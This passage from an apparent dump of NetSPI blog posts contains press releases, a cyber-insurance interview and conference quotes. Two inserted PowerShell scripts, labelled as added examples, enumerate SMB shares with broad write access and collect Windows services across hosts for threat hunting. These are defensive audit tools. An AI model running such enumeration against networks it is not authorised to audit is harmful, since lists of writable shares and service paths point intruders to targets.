[post_date_gmt] => 2022-08-17 13:30:00
[post_content] =>
NetSPI Partner Program equips channel and technology partners with pentesting tools, services, and talent, bolstering security worldwide.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of the NetSPI Partner Program which empowers its global channel and technology partners to deliver offensive security services during a time when it’s needed most.
Partners within the program can offer end users NetSPI’s proven vulnerability management technologies and human-delivered offensive security services, allowing both the partner and NetSPI to expand product and service offerings, further develop customer relationships, and enter new markets. Additionally, last month NetSPI joined the AWS Marketplace, simplifying the procurement process for enterprise organizations with existing AWS relationships by allowing them to purchase NetSPI’s offerings directly via the marketplace.
The program is led by NetSPI’s Vice President of Business Development and Strategic Alliances, Lauren Gimmillaro. Gimmillaro has a track record of launching four successful partner programs, consisting of working with channel, referral, reseller, and technology partners.
“As today’s global attack surface evolves and cybercriminals become more sophisticated in nature, it’s critical to provide end users with the tools, services, and skill sets they need to take an offensive approach to security," said Gimmillaro. “Centered around our customer-first approach, the NetSPI Partner Program will allow our team to extend our world-class pentesting capabilities to a variety of diverse and trusted partners, strengthening organizations’ cyber security efforts across the globe.”
The NetSPI Partner Program encompasses the following partnership types:
Channel Partners: NetSPI provides its full suite of security services and products through a global channel network of referral and reseller partners. To meet partners' requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing, and reseller discounts.
Technology Partners: Security and third-party software companies help build meaningful integrations with NetSPI to improve overall customer experiences.
For both, NetSPI offers technical and sales support to help partners achieve their business and go-to-market goals.
"Through the NetSPI Partner Program, SecureLink has been able to provide enterprises in the Middle East and Africa region access to NetSPI's continuous and scalable suite of offensive security solutions,” said Manish Pardeshi, director of cybersecurity practices at SecureLink. “With NetSPI, we are proud to offer unmatched sophistication, methodology, and value to our global customer base."
“Apiiro is proud to be part of the NetSPI Partner Program. The partnership has provided our customers with next-gen, context aware pentesting capabilities and NetSPI customers with our ability to detect and fix critical risks in cloud-native applications,” said John Leon, vice president of business development at Apiiro. “Being a member of the NetSPI Partner Program allows us to achieve our sales goals while providing mutual customers with industry leading services and expertise.”
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
The average cost of a data breach in 2021 was $4.35 million.
The average cost of a ransomware attack, not including the cost of the ransom was $4.54 million in 2021.
60 percent of organizations’ breaches led to increases in prices passed on to customers.
Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.
Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate.
For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.
What’s going on in the cyber insurance market?
Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums.
On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase.
Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction.
But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.
As cyber insurance matures, is it becoming yet another regulation or standard to comply with?
Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption.
Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim.
There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.
Who typically manages the cyber insurance process?
According to the webinar attendees, here is the breakdown of how cyber insurance is managed at their respective organizations, many of which came from financial institutions:
42% risk management
25% finance
25% information security
8% general counsel/legal
Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Industry (PCI) compliance.
These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process.
How has ransomware played a role in the cyber insurance market?
Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for.
Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before.
How have cybersecurity insurance questionnaires evolved?
Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.
That has changed. Lots of insurance carriers are now hiring specific technical people that have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing.
How do you navigate situations where providers require specific vendors for your solutions and controls?
Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.
This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them.
Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late.
There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out?
Ethan: We don’t like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there's going to be weaknesses that can be found if you look close enough.
If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur.
We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.
Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out.
Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls?
Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums.
We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today.
For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.
[post_title] => The Current State of Cyber Insurance
[post_excerpt] => Get answers to your cybersecurity insurance questions with industry experts Ethan Harrington and Mary Roop from 221b Consulting.
[post_name] => state-of-cyber-insurance
[post_modified] => 2023-01-23 15:10:23
[post_modified_gmt] => 2023-01-23 21:10:23
[guid] => https://www.netspi.com/?p=28189
)
[30] => WP_Post Object
(
[ID] => 28157
[post_author] => 91
[post_date] => 2022-08-09 09:00:00
[post_date_gmt] => 2022-08-09 14:00:00
[post_content] =>
The tools help defense teams discover vulnerable network shares and identify adversary behaviors.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.
These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.
PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
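As an added illustration of the check PowerHuntShares automates (this script was written for this page and is not PowerHuntShares or any other NetSPI code), the PowerShell below queries the share-level ACLs of the non-administrative SMB shares on a list of hosts and flags entries that grant Change or Full Control to broad principals such as Everyone, Authenticated Users or Domain Users. It assumes the SmbShare module (Windows 8 / Server 2012 and later), that CIM over WinRM is reachable, and that the caller is allowed to query shares on the targets; the host names, the list of "broad" principals and the output file name are placeholders.

```powershell
# Added example, not PowerHuntShares: flag SMB shares whose share-level ACL grants
# write access to broad principals. Assumes the SmbShare module and CIM/WinRM access.
param(
    [string[]]$ComputerName = @($env:COMPUTERNAME)   # assumed: replace with domain-joined hosts
)

# Principals whose write access on a share usually means "anyone in the domain can write".
# This list is an assumption and a starting point, not an exhaustive definition.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    '*\Domain Users',
    '*\Domain Computers'
)

function Test-BroadPrincipal {
    param([string]$Account)
    foreach ($pattern in $BroadPrincipals) {
        if ($Account -like $pattern) { return $true }
    }
    return $false
}

function Get-ExcessiveShareAccess {
    param([string]$Computer)
    $session = New-CimSession -ComputerName $Computer -ErrorAction Stop
    try {
        # Skip administrative shares (C$, ADMIN$, IPC$); they are expected and reviewed separately.
        $shares = Get-SmbShare -CimSession $session | Where-Object { $_.Name -notmatch '\$$' }
        foreach ($share in $shares) {
            $acl = Get-SmbShareAccess -CimSession $session -Name $share.Name
            foreach ($ace in $acl) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if (-not (Test-BroadPrincipal $ace.AccountName)) { continue }
                # Change and Full both allow writing; Read-only grants are reported elsewhere.
                if ($ace.AccessRight -in @('Change', 'Full')) {
                    [pscustomobject]@{
                        Computer    = $Computer
                        Share       = $share.Name
                        Path        = $share.Path
                        Principal   = $ace.AccountName
                        AccessRight = $ace.AccessRight
                    }
                }
            }
        }
    }
    finally {
        Remove-CimSession $session
    }
}

$findings = foreach ($c in $ComputerName) {
    try { Get-ExcessiveShareAccess -Computer $c }
    catch { Write-Warning "$c : $($_.Exception.Message)" }
}

if (@($findings).Count -gt 0) {
    $findings | Export-Csv -NoTypeInformation -Path .\excessive-shares.csv   # assumed output path
    $findings | Format-Table -AutoSize
}
else {
    Write-Host 'No broad write access found on non-administrative shares.'
}
```

Share-level ACLs are only half of the picture: effective access is the intersection of the share ACL and the NTFS ACL on the underlying path, so a hit here should be confirmed against the folder's NTFS permissions before it is called exploitable, which is also why a tool like PowerHuntShares adds ownership and creation-date context to each share.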
PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. It can also output easy-to-consume .csv files so that additional triage and analysis can be done using other tools and processes.
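The collect-then-stack pattern that PowerHunt applies to artifacts, shown as an added example written for this page rather than code from PowerHunt or NetSPI: the script pulls one artifact type (installed services and their binary paths) from a list of hosts over PowerShell remoting, writes the raw rows to CSV for other tools, then counts how many hosts share each service/path pair so that values present on only a few hosts stand out. It assumes WinRM is enabled and the caller is a local administrator on the targets; the host names, the outlier threshold and the file names are placeholders.

```powershell
# Added example, not PowerHunt: collect Windows services from many hosts via
# PowerShell remoting, stack the results, and surface rare values and risky paths.
param(
    [string[]]$ComputerName = @('ws01', 'ws02', 'ws03'),   # assumed host names
    [int]$MaxHostsForOutlier = 2                            # assumed threshold: "rare" = on this many hosts or fewer
)

# Runs on each target. Win32_Service gives the binary path and the account the service runs as.
$collector = {
    Get-CimInstance Win32_Service | ForEach-Object {
        [pscustomobject]@{
            Computer  = $env:COMPUTERNAME
            Name      = $_.Name
            PathName  = $_.PathName
            StartName = $_.StartName
            Collected = (Get-Date).ToUniversalTime().ToString('o')
        }
    }
}

# Fan out to all hosts in parallel; an unreachable host produces a warning, not a stop.
$artifacts = Invoke-Command -ComputerName $ComputerName -ScriptBlock $collector -ErrorAction Continue |
    Select-Object Computer, Name, PathName, StartName, Collected

if (@($artifacts).Count -eq 0) {
    Write-Warning 'No artifacts collected.'
    return
}

# Raw data first, so other tools can triage it regardless of the analysis below.
$artifacts | Export-Csv -NoTypeInformation -Path .\services.csv   # assumed output path

# Stack by service name + binary path and count distinct hosts per value.
# In a uniform fleet, most pairs appear everywhere; the rare ones are the hunting leads.
$stack = $artifacts |
    Group-Object { "$($_.Name)|$($_.PathName)" } |
    ForEach-Object {
        $hosts = @($_.Group.Computer | Sort-Object -Unique)
        [pscustomobject]@{
            Key       = $_.Name
            HostCount = $hosts.Count
            Hosts     = $hosts -join ';'
        }
    }

$outliers = $stack | Where-Object { $_.HostCount -le $MaxHostsForOutlier } | Sort-Object HostCount

# Two static checks that do not depend on fleet size: unquoted service paths containing
# spaces, and binaries in user-writable or staging locations. Expect some false positives;
# this is a triage filter, not a verdict.
$suspiciousPaths = $artifacts | Where-Object {
    ($_.PathName -match '^[^"].*\s.*\.exe') -or
    ($_.PathName -match '\\Users\\|\\Temp\\|\\AppData\\|\\ProgramData\\')
}

if (@($outliers).Count -gt 0) {
    $outliers | Export-Csv -NoTypeInformation -Path .\services-outliers.csv
    $outliers | Format-Table -AutoSize
}
if (@($suspiciousPaths).Count -gt 0) {
    $suspiciousPaths | Export-Csv -NoTypeInformation -Path .\services-suspicious-paths.csv
    $suspiciousPaths | Format-Table Computer, Name, PathName -AutoSize
}
```

The same collector/stack structure applies to other artifact types (scheduled tasks, Run keys, WMI subscriptions); only the script block run on each host changes, which is what makes a framework of collection modules worthwhile once the host count grows.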
“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”
NetSPI’s global penetration testing team has developed several open-source tools, including popular penetration testing tools PowerUpSQL and MicroBurst. Learn more about NetSPI’s commitment to open-source tool development on the company’s tool repository.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over one million assets to find four million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
This Gartner Hype Cycle for Security Operations includes entries across the SecOps space that “aim to help security and risk management leaders strategize and deliver effective response and remediation.”
We believe our inclusion in this year’s report validates NetSPI’s PTaaS model.
NetSPI's Resolve™ platform delivers its core benefits in three areas:
Hybrid automated and manual testing approach: NetSPI leverages a combination of automation and human pentesters to increase the efficiency and effectiveness of the results. With automation, NetSPI alleviates many of the mundane vulnerability management tasks for organizations—enabling more manual pentesting to find and fix business-critical vulnerabilities.
Real-time validation and faster remediation: NetSPI’s PTaaS model delivers a platform that enables faster scheduling and execution, and real-time communications with testers and visibility of test results. By providing access to real-time findings, NetSPI enables earlier remediation of vulnerabilities.
Support for teams with limited in-house security experts: NetSPI provides customized and tailored guidance throughout the life cycle of each assessment to support internal teams facing the pressures of the security skill gap.
“To us, this acknowledgment by Gartner further cements our approach to delivering innovative vulnerability and risk management solutions to today’s top enterprises,” said Travis Hoyt, CTO at NetSPI. “Traditional penetration testing is dead. PTaaS allows organizations to remediate faster, receive support from expert pentesters, and implement a strategic approach to offensive security.”
According to Gartner, “the adoption of remote work, and increased use of mobile devices and cloud services have not slowed over the last 12 months. This has led to expanded requirements for organizations to track risk and threats to a wider set of digital assets. With the expansion of digital business functions and third-party-managed assets, security and risk management leaders must reevaluate how their business-critical environments change security strategy and tooling.” The report also mentions that “pentesting is foundational in a security program and mandated by various compliance standards. PTaaS enables organizations to elevate their security posture through continual assessment, and integrates validation earlier in the AppDev cycle by giving access to real-time findings delivered through the platform, therefore enabling faster treatment of vulnerabilities.”
Gartner, Hype Cycle for Security Operations, 2022, Andrew Davies, 5 July, 2022.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and HYPE CYCLE are the registered trademarks of Gartner Inc., and/or its affiliates in the U.S and/or internationally and have been used herein with permission. All rights reserved.
About NetSPI
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Recognized in the 2022 Gartner® Hype Cycle™ for Security Operations
[post_excerpt] => Learn why NetSPI was recognized by Gartner for its innovations in Penetration Testing as a Service (PTaaS).
[post_modified] => 2023-01-23 15:10:25
[guid] => https://www.netspi.com/?p=28162
)
[32] => WP_Post Object
(
[ID] => 28141
[post_date] => 2022-08-03 10:01:48
[post_content] =>
Penetration Testing as a Service (PTaaS) leader marks its presence with various speaking sessions, open source tool releases, and a happy hour event during this year’s Black Hat and DEF CON conferences.
Minneapolis, MN and Las Vegas – NetSPI, the leader in enterprise security testing and attack surface management, will be participating in several speaking sessions and activities during Black Hat 2022 and DEF CON, taking place at the Mandalay Bay Expo Hall in Las Vegas starting on August 10. NetSPI is located at Booth #1687 on the Mandalay Bay Trade Floor.
With over 20 years of experience, NetSPI’s team of over 200 global pentesters is highly skilled in manual pentesting and laser-focused on excellence. During the events, these company experts will inform attendees on the vulnerabilities and escalating threats targeting enterprises, as well as share insights on how businesses can mature their security programs and empower their workforces.
NetSPI speaking sessions during Black Hat and DEF CON include:
On August 10 at 10:20am PT, Nick Landers, Director of Research at NetSPI, will present at Black Hat alongside James Forshaw, Security Researcher at Google Project Zero, in a talk titled: “Elevating Kerberos to the Next Level.” In this talk, Nick and James will conduct a deep dive into the inner workings of Kerberos as it applies to local authentication and some of the unusual behaviors to be found within. They will also describe the Kerberos security issues they’ve discovered, including authentication bypasses, sandbox escapes and arbitrary code execution in privileged processes.
On August 12 at 10:10am PT, Karl Fosaaen, Senior Director at NetSPI, will present at the DEF CON Cloud Village in a talk titled: “Automating Insecurity in Azure.” In this talk, Karl will go over how Automation Accounts function within Azure, how attackers can abuse built-in functionality to gain access to credentials, privileged identities, and sensitive information, and present a deep dive on four vulnerabilities from the last year that all apply to Azure Automation Accounts.
On August 12 and 13, Melissa Miller, Managing Security Consultant at NetSPI, will present at the DEF CON Girls Hack Village.
On August 12 at 5pm PT, in her talk “Imposter Syndrome: The Silent Killer of Motivation,” Melissa will discuss the characteristics of a healthy work environment and steps toward changing your environment to make it right for you, along with how to realistically identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
On August 13 at 1:30pm PT, on the Hacking Diversity panel, Melissa will discuss how the industry can increase diversity in cybersecurity.
During Black Hat, Scott Sutherland, Senior Director at NetSPI, will be revealing two new open source tools for security operations centers. The new tools are designed to help teams hunt for artifacts and anomalies associated with common “known bad” behaviors, and help teams inventory, naturally group, and prioritize the triage/remediation of excessive privileges assigned to SMB shares hosted across Active Directory computers.
For more information or to book a meeting with one of NetSPI’s experts at Black Hat or DEF CON, please click here.
You can also join NetSPI for their Black Hat happy hour, co-hosted by Adaptive Shield and Armis, on August 10 at 5 PM PT at the Foundation Room Las Vegas, located on the 63rd floor of Mandalay Bay. Register your spot today.
[post_title] => Media Alert: NetSPI at Black Hat 2022 and DEF CON 30
[post_excerpt] => Connect with NetSPI’s expert offensive security team during Black Hat 2022 and DEF CON 30 during their speaking sessions, happy hour, or at the NetSPI booth.
[post_modified] => 2023-01-23 15:10:25
[guid] => https://www.netspi.com/?p=28141
)
[33] => WP_Post Object
(
[ID] => 27963
[post_date] => 2022-06-21 03:00:00
[post_content] =>
Security industry leaders join NetSPI’s EMEA team to fuel growth and meet increased demand for pentesting services in EMEA.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the expansion of its global footprint in Europe, Middle East, and Africa (EMEA) to meet growing international demand for its offensive security solutions.
“NetSPI’s technology-powered services and customer-first focus has solidified the company’s leading position within the North American offensive security industry,” said KKR’s Paul Harragan, a London-based investor in NetSPI. “The team’s specialised skill set, tech acumen and white glove delivery model will resonate with the European market and should drive continued growth and expansion as the team develops and delivers critical offensive security solutions.”
“We’ve experienced a record volume of demand from EMEA organisations needing to improve their security posture through a proven, holistic approach to pentesting, and now, we’re well positioned to deliver this in the region,” said Aaron Shilts, CEO, NetSPI. “We’ve hired a team of extremely talented, energising security leaders who align with our customer-first approach to business. Establishing our EMEA beachhead with this incredible group will ensure NetSPI is destined for accelerated growth and continued success in the region.”
The company has appointed security industry veterans Steve Bakewell, Steve Armstrong, and Eric Graves to strategically lead NetSPI’s EMEA team and drive further growth in the region. Bakewell joins NetSPI as Managing Director of EMEA and brings over 23 years of experience in cybersecurity and risk management across organisations including Central Government & Defence and Royal Bank of Scotland, as well as with security vendors such as CipherCloud, RiskIQ and Citrix.
“The pentesting space is highly competitive in the UK, but vendors in the region simply do not have the pedigree that NetSPI has,” Bakewell said. “NetSPI already provides its penetration testing services to nine out of the top 10 U.S. banks and many of the Fortune 500 – I’m looking forward to the opportunity to serve end users in EMEA during a time when security is high on the business agenda.”
Bakewell will work closely with Armstrong, who has been appointed Regional Vice President for EMEA. Armstrong has two decades of experience in sales and security, spanning companies including Bitglass, CyCognito and Avira. Graves will work alongside Armstrong as NetSPI’s Regional Sales Director for EMEA, leveraging his extensive experience in cybersecurity sales for organisations such as Pentera, TrendMicro and Spok, to meet global demand and provide NetSPI’s award-winning pentesting solutions to EMEA customers. The three leaders will work closely alongside Shilts and oversee NetSPI’s growing team in EMEA.
NetSPI will be at InfoSecurity Europe from June 21-23, 2022 at ExCeL London. Participate in a live demo and meet the company’s security experts at Stand M-12. For more information or to schedule a meeting with NetSPI at InfoSecurity Europe, please click here.
[post_title] => NetSPI Expands Global Footprint with Strategic Leadership Appointments in EMEA
[post_excerpt] => Read about NetSPI’s expansion into the EMEA region to meet increased demand for strategic penetration testing services.
[post_modified] => 2023-01-23 15:10:30
[guid] => https://www.netspi.com/?p=27963
)
[34] => WP_Post Object
(
[ID] => 27956
[post_date] => 2022-06-17 15:01:02
[post_content] =>
The company is recognized for its innovation, culture, and leadership by The Star Tribune and the Top Workplaces Program.
Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, recently won two Top Workplaces awards – Top 200 Workplaces in Minnesota and the Cultural Excellence Awards – recognizing the company’s forward-looking innovation, team-first culture, and dedicated leadership team.
Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions, measuring engagement, organizational health, and satisfaction, and the Cultural Excellence Awards highlight the company’s advancement in three key areas:
Innovation: Celebrates organizations who have embedded innovation into their culture and create an environment where new ideas come from all employees.
Purpose & Values: Celebrates organizations who have both embedded their mission and values into their culture and are efficient in their work to bring it into reality.
Leadership: Celebrates organizations whose leaders inspire confidence in their employees and in the direction of the company.
“We prioritize fostering an environment that ensures every team member feels valued, heard, and supported,” said Heather Crosley, Director of People Operations at NetSPI. “These two recognitions prove that our dedication to our culture is resonating across our workforce, and I want to thank our team for making NetSPI a great place to work.”
These recognitions come during a year of rapid growth and innovation for NetSPI, as the company brought on more than 90 new employees this year already. NetSPI’s strong recruiting and retention initiatives and flexible company culture drive the development of new mission-critical services, with the company recently announcing the launch of its new attack surface management service, as well as enhancements to its breach & attack simulation offering. NetSPI is also expanding its global presence, building on its current momentum to serve the EMEA region.
“Retaining top talent is more important than ever in today’s evolving cybersecurity threat environment,” said Aaron Shilts, CEO of NetSPI. “Our workforce consistently exceeds expectations, and our team-first culture is a driving force of that success. We are honored to be recognized by the Star Tribune and Top Workplaces.”
The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from employees at Minnesota public, private, and nonprofit organizations. Earlier this year, NetSPI was recognized as a 2022 National Top Workplace.
[post_title] => NetSPI Named a Top Minnesota Workplace and Honored for its Cultural Excellence
[post_excerpt] => Learn what makes NetSPI a Top Workplace in Minnesota and a leader in cultural excellence.
[post_modified] => 2023-01-23 15:10:32
[guid] => https://www.netspi.com/?p=27956
)
[35] => WP_Post Object
(
[ID] => 27877
[post_date] => 2022-06-07 08:00:00
[post_content] =>
The RSA Conference is one of the largest cybersecurity events in the world, offering a multitude of opportunities for members of the cybersecurity community to gain valuable insights and network with one another. And this week, the NetSPI team packed their bags and flew out to San Francisco for the conference after a two-year hiatus.
What are you looking forward to most during the 2022 RSA Conference?
What does NetSPI’s recognition as “Most Innovative in Penetration Testing” mean to you and what do you think makes NetSPI the most innovative pentesting company?
Continue reading for responses from our product, services, and sales leadership – all of which were clearly excited to see many of our clients and customers in-person.
What are you looking forward to most during the 2022 RSA Conference?
Cody Chamberlain, Head of Product
“The security community isn’t very large and bringing everyone together is extremely valuable. This is an opportunity for connecting, sharing stories, and further building relationships across companies.
Talking with clients and prospects about the NetSPI story is the most exciting thing for me. We are in a unique position in the market with our combination of industry-leading talent and technology and I’m excited to share that with people at the conference, especially those unaware of us.”
Charles Horton, Chief Operating Officer
“The RSA Conference has always had an impressive lineup of speakers and sessions. Having a hiatus like many conferences have had, I think there will be a tremendous amount of energy coming into the conference as people are eager to collaborate in person with clients, colleagues, and vendors. As the landscape continues to move and shift, and clients go through different investment levels and cycles of their security programs, it is an opportune time to evaluate who and where they are investing their dollars given the number of sponsor organizations at the event.”
Chad Peterson, Managing Director
“I am most excited about getting the opportunity to speak with our clients and industry face-to-face again. Any time we have the chance to interact in person, it always seems to foster great conversations and thought leadership.
Having a group of experts throughout the industry under one roof again allows us to exchange ideas on how to better the security community and holistically help our shared client base.”
Robert Richardson, VP of Enterprise Sales
“The opportunity to connect face-to-face and spend time with our clients and meet new people is what I’m most excited about. It’s been too long. I’m really glad the turnout is exponentially larger than 2020.”
Alex Jones, Chief Revenue Officer
“I’m absolutely most excited about seeing all of our amazing customers. It has been such a long time since our last in-person RSA conference and the event presents such a great opportunity to connect with a high volume of people in such a short time. A huge plus is that we get to enjoy seeing our customers while also doing a lot of events with our NetSPI team.
From a presentation perspective, I am most intrigued about Bruce Schneier’s keynote, ‘What Matters Most.’ There is so much change occurring at such a rapid pace within our industry that we need to challenge conventional thinking and start trying to solve problems in a different way.”
Nabil Hannan, Managing Director
“With the RSA conference being an in-person event this year, I’m most excited to re-connect with people in the industry in person. After two plus years of the pandemic, it’ll be really nice to re-connect with colleagues and catch up in person and learn from them about their current areas of focus, challenges, and the industry trends that they’re observing.”
What does NetSPI’s recognition as most innovative in pentesting mean to you and what do you think makes NetSPI the most innovative pentesting company?
Cody Chamberlain, Head of Product
“It means we’re getting third-party validation of what we already know – that we have the best talent in the industry and the investments we’ve made into our technology are meeting the market’s need of high-touch customer service. As a result, we’re able to identify more vulnerabilities of a higher severity for our clients.
Our people make NetSPI the most innovative pentesting company. As the person who works everyday building and executing a technology roadmap, that might sound counter intuitive, but I see my job as finding the best ways to scale and maximize the effectiveness of our humans. At the end of the day, humans are the key to our success!”
Charles Horton, Chief Operating Officer
“The award is certainly flattering and is really a reflection of the purpose we have as an organization along with our passion and pursuit of excellence. NetSPI has achieved this recognition due to our unwavering commitment to our clients and our team members. Our mission is to combine elite talent and technology to provide a differentiated experience and outcome for our clients, and we take pride in that recognition. This award is based on our work and reputation for things already done, and we will continue to build on this as we go forward.”
Chad Peterson, Managing Director
“Winning this awareness is a testament to all the hard work and dedication our teams have put in. From the consultants, technicians, sales, and strategy teams to marketing and leadership – everyone has had their hand in making NetSPI what we are, and it shows in the work that we are being honored for.
We have some of the most talented penetration testing experts in the industry. Without these people to shape the technology that we leverage – Resolve, AttackSim, and the Attack Surface Management platform – to streamline our work and allow our pentesting consultants to spend their valuable time identifying, verifying, and providing guidance on how to address findings for our clients, we would not be the company that we are today.”
Robert Richardson, VP of Enterprise Sales
“The secret is out. We’ve been delivering game changing quality and consistency for years, so it’s really exciting to see our growth and brand be recognized.
It’s a combination of our technology, people, and culture – the combination of those things creates consistency and quality in the depth of our services.”
Alex Jones, Chief Revenue Officer
